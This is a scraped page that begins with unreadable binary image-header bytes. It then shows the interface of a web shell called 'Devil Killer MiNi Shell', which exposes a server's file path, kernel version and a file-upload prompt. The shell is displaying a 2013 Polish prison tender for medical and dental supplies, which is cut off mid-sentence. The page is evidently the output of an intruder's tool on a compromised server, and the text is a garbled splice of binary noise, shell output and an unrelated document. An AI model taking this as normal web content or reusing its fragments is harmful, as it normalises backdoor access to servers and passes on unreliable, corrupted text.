JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130930/395704-N-2013.html

<p class="kh_header"><b>Potulice: Dostawy artykułów medycznych (znak sprawy 20/2013)</b><br>
<b>Numer ogłoszenia: 395704 - 2013; data zamieszczenia: 30.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , Aleja Parkowa 1, 89-120 Potulice, woj. kujawsko-pomorskie, tel. 052 5874440, faks 052 5874400.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieziennictwo.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów medycznych (znak sprawy 20/2013).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Grupa 1:
L.p.	Przedmiot zamówienia	Nomenklatura CPV	Ilość szacunkowa
1	Pojemnik na zużyte igły i strzykawki poj. 1 - 1,5 l , w kolorze czerwonym, pokrywa pojemnika ma wielowpustowe zatrzaski; po otwarciu pokrywa uszkodzona uniemożliwia ponowne użycie pojemnika	33100000-1	400 szt.
2	Pojemnik na zużyte igły , w kolorze czerwonym - 0,5- 08 l ,pokrywa pojemnika ma wielowpustowe zatrzaski; po otwarciu pokrywa uszkodzona uniemożliwia ponowne użycie pojemnika	33100000-1	500 szt.
3	Pojemniki do moczu sterylne	33141615-4	100 szt.
4	Pojemniki do moczu niejałowe	33141615-4	50 op.1op- 50 szt.(łącznie 2500 szt.)
5	Pojemniki do badania kału z łopatką, niesterylny	33100000-1	10 op. 1 op - 50 szt.( łącznie -500 szt.)
6	Kieliszki jednorazowego użytku 25 ml do leków, opakowanie od 50-100 sztuk	33100000-1	800 op.1op - 75 szt . (łącznie 60000szt ) .
7	Miska nerkowata, 28 cm, plastikowa	33196000-0	4 szt.
8	Wiaderko na odpady medyczne 10 l z pokrywą na zatrzask w kolorze czerwonym	33100000-1	100 szt.
9	Worek z kołnierzem na odpady medyczne/wymioty	19520000-7	6 op1 op - 30 szt.(łącznie180 szt.)
10	Rękaw foliowo - papierowy do sterylizacji 50 mm x 200 m	33198000-4	3 szt
11	Rękaw foliowo - papierowy do sterylizacji 100 mm x 200 m	33198000-4	3 szt
12	Rękaw foliowo - papierowy do sterylizacji 200 -250 mm x 200m	33198000-4	2 szt.

2.	Grupa 2:
L.p.	Przedmiot zamówienia	Nomenklatura CPV	Ilość szacunkowa
1	Miazgociągi	33130000-0	3 op.1 op. - 6 szt.(łącznie 18 szt.)
2	Wiertła - diamentowe kulki na turbinę 014	33131510-5	10 szt
3	Wiertła - diamentowe kulki na turbinę 016	33131510-5	10 szt.
4	Wiertła - diamentowe kulki na turbinę 018	33131510-5	10 sz.
5	Wiertła - diamentowe kulki na turbinę 021	33131510-5	10 szt.
6	Wiertła - diamentowe kulki na turbinę 023	33131510-5	10 szt.
7	Wiertła - diamentowe walce na turbinę 016	33131510-5	10 szt.
8	Wiertła - spiekany węglik różyczki 016	33131510-5	5 szt.
9	Wiertła - spiekany węglik różyczki 018	33131510-5	5 szt.
10	Olej do oliwienia końcówek 	33130000-0	5 szt
11	Kątnica turbinowa	33130000-0	1 szt
12	Kątnica do mikrosilników	33130000-0	1 szt
13	Szczoteczki do mycia wierteł	33130000-0	3 szt
14	Przyłbica ochronna z gumką przeznaczona do ochrony twarzy przed odpryskami ciał stałych i rozbryzgami cieczy.	33735100-2	2 szt
15	Tacki stomatologiczne plastikowe - małe, jednorazowego użytku.	33131300-0	3 op.1 op. -100 szt.(łącznie 300 szt.)
16	Jednorazowe pokrowce na zagłówki, warstwa bibuły z folią PE, uniwersalne, odporne na rozrywanie.	33141850-3	5 op.1 op. - 50 szt.(łącznie 250 sztuk)
17	Pilnik do kanału typuH ręczny 15-40 25 mm	33130000-0	2 op.
18	Sączki papierowe 	33130000-0	5 op.
19	Kalka korekcyjna prosta 	33130000-0	2 op.
20	Palnik spirytusowy	33130000-0	1 szt.
21	Pojemnik do dezynfekcji wierteł i narzędzi obrotowych 	33191000-5	1 szt.


3. Grupa 3:
L.p.	Przedmiot zamówienia	Nomenklatura CPV	Ilość szacunkowa
1	Probówki typu Vacuette na 1,5 ml krwi z 3,2 % roz. cyt. sodu, dostosowane do badania w statywie	33192500-7	30 op.1 op.- 50 szt.(łącznie 1500 szt.)
2	Probówki typu Vacuette na 1,8 ml krwi z 3,8% roz. cyt. sodu	33192500-7	30 op.1 op. - 50 szt.(łącznie1500 szt.)
3	Probówki typu Vacuette na 2 ml krwi z EDTA - K2	33192500-7	40 op.1 op.- 50 szt.(łącznie 2000 szt.)
4	Probówki typu Vacuette na 9 ml krwi z EDTA - K3	33192500-7	10 op.1op - 50 szt.(łącznie 500 szt.)
5	Probówki typu Vacuette na 9 ml krwi z aktywatorem wykrzepiania	33192500-7	40 op.1 op. - 50 szt.(łącznie 2000 szt.)
6	Probówki typu Vacuette na 6 ml krwi z aktywatorem wykrzepiania (wymiary 13x100 mm)	33192500-7	50 op.1 op. - 50 szt.(łącznie 2500 szt.)
7	Uchwyty do probówek z gwintem na igły do systemu Vacuette	33100000-1	300 op.1 op. - 10 szt.(łącznie 3000 szt.)
8	Igły motylkowe do trudnych wkłuć w systemie typu Vacuette 0,8x19mm, (wężyk 19 cm)	33141300-3	6 op.1 op. - 50 szt.(łącznie 300 szt.)
9	Igły typu Vacuette 38x9 (żółte)	33141300-3	35 op.1 op. - 100 szt(łącznie 3500 szt.)
10	Nożyki bezpieczne, automatyczne, jednorazowe do nakłuć palca	33141300-3	20 op.1 op. - 200 szt.(łącznie 4000 szt.)


4. Grupa 4:
L.p.	Przedmiot zamówienia	Nomenklatura CPV	Ilość szacunkowa
1	Staza automatyczna z rozpinanym, plastikowym zapięciem, niezbędna np. podczas wykonywania wkłuć dożylnych czy pobieraniu krwi, w różnych kolorach	33140000-3	12 szt.
2	Staza jednorazowa na rolce	33140000-3	6 op.1 op. - 25 szt.(łącznie 150 szt.)
3	Bezdotykowy termometr na podczerwień do pomiaru temperatury ciała	33158500-7	4 szt.
4	Szpatułki drewniane - jałowe	33100000-1	10 op.1op. -100 szt.(łącznie 1000 szt.)
5	Resuscytator silikonowy AMBU z maską nr 5 , wentylacja pacjentów dorosłych, wielokrotnego użytku. Wymagany zakres temperatury sterylizacji 1210 C - 1340C	33157700-2	3 szt.
6	Rurka intubacyjna z mankietem, z oczkiem Murphyego ze zgiętą końcówką nr 7.0	33171000-9	5 szt.
7	Rurka intubacyjna z mankietem, z oczkiem Murphyego ze zgiętą końcówką nr 8.0	33171000-9	5 szt.
8	Rurka intubacyjana z mankietem, z oczkiem Murphyego ze zgiętą końcówką nr 9.0	33171000-9	5 szt
9	Rurka ustno-gardłowa nr 4 (dla dorosłych)	33171000-9	10 szt.
10	Cewnik do odsysania jałowy typ prosty (zmrożony ), rozmiar 16	33141200-2	30 sztuk
11	Stojak medyczny z regulacją na kółkach z dwoma wieszakami	33190000-8	1szt
12	Sonda żołądkowa nr 20	33141641-5	6 szt.
13	Sonda żołądkowa nr 24	33141641-5	6 szt.
14	Kula łokciowa dla dorosłych, regulacja wysokości	33141710-0	6 szt.
15	Zegarowy aparat do pomiaru ciśnienia tętniczego krwi na ramieniu . Obsługa w pełni manualna. Zakres pomiaru 0-300 mmHg. Przyciskowy zawór spustowy. Mankiet ciśnieniomierza przystosowany dla osób otyłych.	33100000-1	1 szt.
16	Pulsooksymetr do nieinwazyjnego pomiaru nasycenia tlenem hemoglobiny tętniczej (SpO2) u osób dorosłych, palcowy.	33195110-7	1 szt.
17	Filtr antybakteryjny do rurki intubacyjnej dla dorosłych	33171000-9	10 szt.
18	Jałowa pałeczka do wymazów z podłożem transportowym 72 godziny	33192500-7	30 szt.
19	Kołnierz ortopedyczny typu Florida z podparciem brody dla dorosłych	33141730-6	2 szt.
20	Przepływowa lampa bakteriologiczna na statywie jezdnym, zakres działania lampy 18 - 36 m2	33158300-5	1 szt.
21	Gotowy plastikowy kompaktowy zestaw do drenażu jamy opłucnej	33141642-2	14 szt.









5. Grupa 5:
L.p.	Przedmiot zamówienia	Nomenklatura CPV	Ilość szacunkowa
1	Rękawice nitrylowe, niepudrowane S	33141420-0	80 op.1 op. - 100 szt.(łącznie 8000 szt.)
2	Rękawice nitrylowe, niepudrowane M	33141420-0	100 op.1 op. - 100 szt.(łącznie 10000 szt.)
3	Rękawice nitrylowe, niepudrowane L	33141420-0	50 op.1 op. - 100 szt.(łącznie 5000 szt.)
4	Papier na kozetkę jednowarstwowy z celulozy szerokość 60 cm	33772000-2	50 rolek
5	Maseczki ochronne dla personelu medycznego Klasy P-2 z zaworem wydechowym, spełniające wymogi według normy PN/EN149, chroniące personel medyczny przed cząstkami bioaerozolu o wymiarach 0,5-1 mikrometra.	33140000-3	200 szt.

6. Grupa 6:
L.p.	Przedmiot zamówienia	Nomenklatura CPV	Ilość szacunkowa
1	Płyn do tamowania krwawienia zawierający substancję czynną chlorek glinu 25%, opakowanie: butelka z zakraplaczem 10g	33141800-8	1op.1op. - 10g(łącznie 10g)
2	Amalgamat wysokomiedziowy, nie zawierający fazy Gamma-2, o składzie: Ag 40%, Sn 31,3%, Cu 28,7%, Hg 47,9% w stosunku do całej objętości pozoztałych składników; opakowanie: 50 kaps. (400mg stopu w tym 368mg rtęci.)	33141810-1	2 op.1op. - 50 kaps.(łącznie 100 kaps.)
3	Opatrunek wodorotlenkowo-wapniowy o składzie: wodorotlenek wapnia, fosforan wapnia dwuzasadowy, tlenek magnezu, chlorek sodowy, chlorek wapnia bezwodny, chlorek potasowy, węglan sodowy bezwodny; 1 g wyrobu = 330 mg wodorotlenku wapnia; proszek 10g	33141800-8	3 op.1op. - 10g(łącznie 30g)
4	Materiał do tymczasowych wypełnień na bazie wodorotlenku wapnia, strzykawka zawierająca 0,32-0,34g wodorotlenku wapnia 1 szt.	33141810-1	3 szt.
5	Cement cynkowo-polikarboksylowy wskazany do stosowania jako wypełnienie tymczasowe, liner pod wypełnienia z amalgamatu i materiałów kompozytowych oraz do tymczasowego i ostatecznego osadzania uzupełnień protetycznych, proszek + płyn (80g+40g)	33141830-7	3 op.1op. - proszek  80g +  płyn 40g 
6	Cement fosforanowy wolnowiążący, proszek + płyn w pojemniku z kroplomierzem (30g+18ml)	33141830-7	5 op.1op. - proszek 30g + płyn 18ml 
7	Cement szkło-jonomerowy do wypełnień ubytków i odbudowy zębów, barwa uniwersalna, zestaw: proszek (10g) + płyn (10g)+ wytrawiacz(10g) + lakier ochronny(10g) + akcesoria	33141810-1	7 op.1op. - proszek + płyn + wytrawiacz + lakier ochronny po 10g
8	Płyn do płukania kanałów korzeniowych, substancja czynna: podchloryn sodu 2%, butelka 200g	33141800-8	4 op.1op. - 200g(łącznie 800g)
9	Bezarsenowa pasta dewitalizacyjna zawierająca dwie substancje czynne: paraformaldehyd oraz lidokainę,opakowanie 5g	33141800-8	5 op. 1op. - 5g(łącznie 25g)
10	Maść do leczenia chorób miazgi zębów oraz tkanek okołowierzchołkowych, zawierająca: octan deksametazonu, siarczan framycetyny, siarczan polimyksyny B; 5g	33141800-8	4 op. 1op. - 5g(łącznie 20g)
11	Uszczelniacz kanałów korzeniowych, skład: Hydrokortyzonu octan 1,0 g, pozostałe składniki: (dijodek tymolu, siarczan baru, tlenek cynku, stearynian magnezu) do 100,0 g; proszek 14g	33141800-8	3 op. 1op. - 14g(łącznie 42g)
12	Preparat do płukania i poszerzania kanałów korzeniowych o składzie: wersenian disodowy (EDTA), bromek benzalkoniowy, wodorotlenek sodu, woda oczyszczona. 1 g płynu musi zawierać 150 mg wersenianu disodowego; butelka z zakraplaczem; 10g 	33141800-8	1 op.1op. - 10g(łącznie 10g)
13	Eugenol płyn 10 g	33141800-8	5 op.1op. - 10g(łącznie 50g)
14	Chemowiążący materiał kompozytowy z makrowypełniaczem o wskazaniach: odbudowa zębów pod uzupełnienia protetyczne, wypełnienia ubytków klasy III i IV , szynowanie; proszek 70 g (1 x 40 g proszku w odcieniu podstawowym i 3 x 10 g proszku w odcieniach uzupełniających) 26 g płynu; 14 g wytrawiacza w płynie + akcesoria 	33141810-1	1 op.1op. - proszek 70g + płyn 26g + wytrawiacz 14g
15	Ćwieki gutaperkowe do wypełniania kanałów korzeniowych, rozmiar: asortyment 15-40; 120 szt.	33141800-8	4 op. 1op. -120 szt.(łącznie 480 szt.) 
16	Chemoutwardzalny cement glassjonomerowy aktywowany wodą, służący jako: materiał podkładowy, wypełnieniowy oraz do cementowania wszystkich prac protetycznych i ortodontycznych, proszek 50g, barwa uniwersalna	33141810-1	6 op.1op. - 50g(łącznie 300g)
17	Jodoform 30g	33141800-8	1 op.1op. - 30g(łącznie 30g)
18	Kamfenol (Camphenol) płyn 15ml	33141800-8	2 op. 1op. - 15ml(łącznie 30ml)
19	Szkło-jonomerowy materiał do wypełnień w granulkach, przeznaczony do ręcznego mieszania; wskazania: wypełnienia niewielkich ubytków klasy I; tymczasowe, długoczasowe wypełnienia ubytków zębów bocznych; wypełnienia ubytków wszystkich klas w zębach mlecznych (jako zamiennik amalgamatu), odbudowa zębów pod uzupełnienia protetyczne, podkład pod wypełnienia z materiałów kompozytowych, uszczelnianie bruzd i zagłębień; proszek 12,5g + płyn 8,5ml kolor A3 	33141810-1	4 op.1op. - proszek 12,5g + płyn 8,5ml
20	Materiał podkładowy typu liner, na bazie wodorotlenku wapnia; normalny czas wiązania; zestaw: 1 x 12 g tubka pasty bazowej, 1 x 12 g tubka katalizatora, bloczek do mieszania	33141810-1	3 op.1op - pasta 12g + katalizator 12g
21	Metronidazol 10 % maść stomat. 5 g	33141800-8	5 op.1op. - 5g(łącznie 25g)
22	Wypełnienie czasowe - czerwone. Wyrób do tymczasowego wypełniania ubytków w zębach w okresie leczenia. Przeznaczony do zamykania wkładek dewitalizacyjnych. Skład: gips modelowy, siarczan cynku, dekstryna żółta, kaolin, tlenek cynku, czerwień pigmentowa. proszek 50g	33141800-8	1 op.1op. - 50g(łącznie 50g)
23	Nici chirurgiczne sterylne, wchłanialne, z kwasu poliglikolowego, powlekane stearynianem magnezowym, igła okrągła, krzywizna: 1;2 koła, długość 22 mm; nić w rozmiarze 3,0 długość nici 70 cm - 36 sztuk w opakowaniu zbiorczym	33141121-4	1 op. 1op. - 36 szt.(łącznie 36 szt.)
24	Acidum acetylsalicylicum 32mg, tabletki do zębodołu, 50 sztuk	33141800-8	5 op.1op. - 50 tabl.(łącznie 250 tabl.)
25	Wyrób do tymczasowego wypełniania ubytków w zębach w okresie leczenia. Przeznaczony do wypełniania ubytków próchnicowych, jako samodzielny opatrunek lub jako pokrycie wkładek stosowanych w leczeniu próchnicy zębów. Skład: gips modelowy, siarczan cynku, dekstryna żółta, kaolin, tlenek cynku, konserwant (tymol 0,10%); proszek 100g	33141800-8	3 op.1op. - 100g(łącznie 300g)
26	Pasta do wypełniania kanałów korzeniowych w zębach mlecznych, widoczna na zdjęciach rtg, skład: Jodoform 12,55 g; Tymol 11,50 g; Kreozot medyczny 2,75 g; Kamfora racemiczna 6,00 g; Pozostałe składniki do 100,00 g; opakowanie 7g	33141800-8	3 op.1op. - 7g(łącznie 21g)


7. Grupa 7:
L.p.	Przedmiot zamówienia	Nomenklatura CPV	Ilość szacunkowa
1	Cewnik do podawania tlenu dł.2100 mm jałowy	33141200-2	10 szt.
2	Cewnik do odsysania górnych dróg oddech. CH16	33141200-2	15 szt.
3	Cewnik Foley nr 16	33141200-2	8 szt. 
4	Cewnik Foley nr 18	33141200-2	8 szt.
5	Cewnik Foley nr 20	33141200-2	8 szt. 
6	Elastyczny bandaż samoprzylepny 10 cm 4,5 m	33141113-4	5 szt. 
7	Elastyczna siatka opatrunkowa R4 1m 	33141113-4	5 szt.
8	Elastyczna siatka opatrunkowa R6 1m	33141113-4 	5 szt.
9	Fartuch fizelinowy 1 * użytku	33196000-0	30 szt.
10	Gaza niejał. bielona opatrunkowa 90 cm  100 m 13-nitkowa	33141114-2	20 op.
11	Gaza opatrunkowa jałowa kopertowana ? m2 13-nitkowa	33141114-2	3000 szt.
12	Igły 1-raz. uż. 0,525100 szt pasujące do strzykawek	33141320-9	30 op. 1op. - 100szt.(łącznie 3000)
13	Igły 1-raz uż. 0,625100 pasujące do strzykawek	33141320-9	20 op.1op. - 100szt.(łącznie 2000)
14	Igły 1-raz. uż. 0,840100 szt. pasujące do strzykawek	33141320-9	55 op.1op. - 100szt.(łącznie 5500)
15	Igły 1-raz. uż. 0,940100 szt. pasujące do strzykawek	33141320-9	10 op.1op. - 100szt.(łącznie 1000)
16	Igły 1-raz. uż. 0,730100 szt. pasujące do strzykawek	33141320-9	20 op.1op. - 100szt.(łącznie 2000)
17	Igły 1-raz. uż. 1,240100 szt. pasujące do strzykawek	33141320-9	30 op.1op. - 100szt.(łącznie 3000)
18	Kompresy gazowe niejał. 17 nitkowe 5cm 5cm 100szt	33141119-7	150 op.1op. - 100szt.(łącznie 15000
19	Kompresy gazowe niejał. 17 nitkowe 7,0-7,5cm *7,0-7,5cm *100szt	33141119-7	220 op.1op. - 100szt.(łącznie 22000 szt.)
20	Kompresy sterylizowane 8 warstw. 10cm 10cm 2 szt.	33141119-7	1100 op.1op. -2 szt.(łącznie 2200szt.)
21	Kompresy sterylizowane 8 warstw. 5cm  5cm 2szt.	33141119-7	6000 op.1op. - 2szt.(łącznie 12000szt.)
22	Kompresy sterylizowane 8 warstw. 7,0-7,5cm*7,0-7,5cm*2szt. 	33141119-7	3000 op.1op. - 2szt.(łącznie 6000szt.)
23	Koreczki do kaniul -jednorazowe, sterylne	33141000-0	100 szt.
24	Lignina płaty 40 cm  60 cm - 5kg	33141115-9	15 op.1op. - 5kg(łącznie 75kg)
25	Maseczka jednorazowa do podawania tlenu	33141200-2	10 szt.  
26	Maseczka 1  użytku na gumce op 50 szt.	33196000-0	23 op.1op.- 50szt.(łącznie 1150 szt.)
27	Nici chirurg. 2-0 3/8 koła DS30 36sasz.	33141121-4	1 op.1op. - 36 sasz.(łącznie 36sasz.)
28	Nici chirurg. 3-0 3/8 koła DS24 36sasz.	33141121-4	1 op.1op. - 36 sasz.(łącznie 36sasz.)
29	Nici chirurg. 3-0 3/8 koła DS30 36sasz.	33141121-4	1 op.1op. - 36 sasz.(łącznie 36sasz.)
30	Nici chirurg. 4-0 3/8 koła DS19 36sasz.	33141121-4	1 op.1op. - 36 sasz.(łącznie 36sasz.)
31	Opaska dziana podtrzymująca 4m  10cm	33141113-4	2500 szt.
32	Opaska dziana podtrzymująca 4m  5cm	33141113-4	100 szt.
33	Opaska elastyczna tkana z zapinką 4-5m  10cm	33141113-4	300 szt.
34	Opaska gipsowa 12-12,5 cm 2,7-3m	33141116-6	20 szt.
35	Ostrza chirurgiczne sterylne nr 15 x100szt	33141411-4	1 op.1op. - 100szt.(łącznie 100szt.)
36	Ostrza chirurgiczne sterylne nr 21 x100szt	33141411-4	1 op.1op. - 100szt.(łącznie 100szt.)
37	Papier do EKG Mortara Eli 250 op250szt.	33196000-0	5 op.
38	Papier do EKG Aspel Ascard-3 104mm40m	33196000-0	3 op.
39	Papier do EKG Aspel Ascard-4 112mm25m	33196000-0	10 op.
40	Papier do EKG Mortara Eli 150 108*140*200	33196000-0	5 op.
41	Pieluchomajtki Medium op. 30	33196000-0	40 op.1op. - 30szt.(łącznie 1200szt.)
42	Plaster jałowy do mocowania kaniul -1 szt.	33141112-8	350 szt.  
43	Plaster włókninowy z gazą 1 m 8 cm	33141112-8	300 szt.
44	Podkład pola operacyjnego 210 150-160 niejał.	33141000-0	80 szt.
45	Przylepiec na białej włókninie 9,1-9,2 m  25 mm	33141112-8	470 szt.
46	Przyrządy do przetaczania krwi TS	33194200-8	5 szt.
47	Przyrządy do przetaczania płynów infuzyjnych IS	33194200-8	500 szt.
48	Rękawice sterylne nr 6 x 2szt (para)	33141420-0	15 par
49	Rękawice sterylne nr 7 x 2szt (para)	33141420-0	10 par
50	Rękawice sterylne nr 7,5 x 2szt (para)	33141420-0	45 par
51	Rękawice sterylne nr 8 x 2szt (para)	33141420-0	25 par 
52	Sterylna serweta operacyjna 50 60cm	33141000-0	35 szt.
53	Strzykawka Janet 100 ml 1  użytku	33141310-6	40 szt.
54	Strzykawka 1  użytku 10ml 100szt. pasujące do igieł	33141310-6	10 op.1op. - 100szt.(łącznie 1000szt.)
55	Strzykawka 1  użytku 5 ml 100szt. pasujące do igieł	33141310-6	40 op.1op. - 100szt.(łącznie 4000szt.)
56	Strzykawka 1  użytku 2 ml 100szt. pasujące do igieł	33141310-6	30 op.1op. - 100szt.(łącznie 3000szt.)
57	Strzykawka 1  użytku 20 ml 100szt. pasujące do igieł	33141310-6	10 op.1op. - 100szt.(łącznie 1000szt.)
58	Test paskowy - do kontroli sterylizacji narzędzi parą wodną op.500 szt	33196000-0	2 op.1op. - 500szt.(łącznie 1000szt.)
59	Venflon/kaniula niebieski 22G-0,8  0,9 mm	33141220-8	200 szt.
60	Venflon/kaniula różowy 20G-1,0  1,1mm	33141220-8	250 szt.
61	Venflon/kaniula zielony 18G-1,2  1,3mm	33141220-8	100 szt.
62	Wata opatrunkowa op. 200g	33141115-9	50 op.1op. - 200g(łącznie 10000g)
63	Worki do dobowej zbiórki moczu 2l	33141615-4	15 szt.
64	Zestaw do biopsji, długość igły 88mm, średnica 18G1,2mm, kąt ścięcia igły 45 st.	33141625-7	15 szt.
65	Zestaw do biopsji długość igły 88mm, średnica 17G1,4mm, kąt ścięcia igły 45 st.	33141625-7	30 szt.
66	Żel do USG i EKG a 0,5 l	33196000-0	10 szt.

7. Ilości szacunkowe artykułów medycznych mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów medycznych będzie wynikała 
z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
8.	Oferowane artykuły medyczne mają być fabrycznie nowe, w zamkniętych 
i nieuszkodzonych opakowaniach.
9.  Termin ważności dostarczanych artykułów medycznych nie może być krótszy niż 12 miesięcy, licząc od momentu dostarczenia do zamawiającego. Dostawa art. medycznych z krótszym terminem ważności może zostać realizowana po uprzednim uzyskaniu zgody od Zamawiającego.
10. Dostarczane artykuły medyczne jednakowe i zgodne pod względem numeru serii oraz terminu ważności z danymi zamieszczonymi na fakturze.
11.	Dostarczane artykuły medyczne mają być oznaczone znakiem CE oraz zgodne z wymogami Polskich Norm przenoszących normy europejskie lub norm innych państw europejskich albo m.in. Polskich Norm, aprobat technicznych, specyfikacji technicznych itp., o czym jest mowa w art. 30 ustawy Prawo zamówień publicznych.
12.	Jeżeli ilość artykułu medycznego w opakowaniu będzie inna niż określił zamawiający, wykonawca koryguje w formularzu cenowym ilość jednostek w taki sposób, aby zgadzała się końcowa wielkość zamawianego wyrobu medycznego, tj. wykonawca oferuję taką samą, lub nie mniejszą ilość jednostek, jaką żąda zamawiający. W takim przypadku wykonawca w formularzu cenowym (załącznik nr 1 do siwz) w kolumnie Przedmiot zamówienia w miejscach wykropkowanych wpisuje ilość np. szt. oferowanego artykułu w opakowaniu, a w kolumnie Ilość szacunkowa, w miejscach wykropkowanych wpisuje taką ilość opakowań (op.), aby łączna ilość art. medycznego w opakowaniach była nie mniejsza niż ilość szt. określona w nawiasie w kolumnie Przedmiot zamówienia. Jeżeli wykonawca będzie oferował artykuł w opakowaniu, które jest niepodzielne przez ilość całkowitą danego artykułu, podaną w szt. określoną w nawiasie w kolumnie 